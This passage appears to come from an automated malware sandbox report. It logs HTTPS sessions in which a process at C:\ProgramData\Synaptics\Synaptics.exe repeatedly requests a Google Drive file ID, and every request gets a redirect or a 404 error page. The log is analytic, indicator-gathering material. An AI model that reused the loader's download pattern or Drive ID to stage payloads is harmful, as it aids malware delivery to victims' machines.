                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.449748142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:57 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-30 10:35:57 UTC1594INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4jUZnsR7ku8pekom5Ye6kOr9KT8qbukHhbmrcjIDOdfSrIY4oS3P9yKCWaHq3rmTRW
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:57 GMT
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-jvGhEtF5kKiK_-35SBjT2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Set-Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM; expires=Tue, 01-Jul-2025 10:35:57 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:35:57 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 74 68 4d 46 4f 44 6f 2d 74 42 4d 39 41 32 4d 5f 32 6d 74 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MthMFODo-tBM9A2M_2mtLg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                              2024-12-30 10:35:57 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.449749142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:57 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:35:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:57 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-QqI6fKpBA6gFNm1S6qyQTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.449750142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:57 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                                                                                              2024-12-30 10:35:57 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6QsfvN0XFAJPuyW2cZohGwamupZR-3NhBfwZfId8hoWRXNA31xFdcdcwbCamYUGka9sfIf0J8
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:57 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-jyvUoBjvlAeuxqSmTk6WDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:35:57 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:35:57 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 61 54 4e 54 74 68 75 38 4e 42 5f 64 59 62 6c 43 64 72 30 69 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="7aTNTthu8NB_dYblCdr0ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:35:57 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.449753142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:58 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:35:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:58 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-H76LHAF5fMDqruRDqNm_8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.449755142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:58 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:35:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:58 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-dUIQ3p2F-qBcp7rLm9uuqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.449756142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:58 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:35:58 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6cTKeBhd9_cqhYEFdMDgw5qRBPLeq9PWal5o59KpjaqfrfAIZww9YLMf4kMiWqHhRu11u7S4w
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:58 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-1m8rdPMaTKKGJ7II6kDjSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:35:58 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:35:58 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 39 63 36 4a 4a 33 4a 56 2d 6f 77 59 4b 32 31 32 6a 77 43 6e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="N9c6JJ3JV-owYK212jwCnw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:35:58 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.449757142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:58 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:35:58 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6SlA2lyzGQMKbOPiXdY9eW7qpoQERr3DyZzAzAg7JDObw09FS1FbuyzIDBCw4QvbtRVwIp1lg
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:58 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-NSbjd6pOiKL5mYOq3LMq0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:35:58 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:35:58 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 2d 53 53 73 5a 76 48 66 6d 4a 39 59 72 4f 77 4e 39 5f 51 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="B-SSsZvHfmJ9YrOwN9_QZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:35:58 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.449762142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:59 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
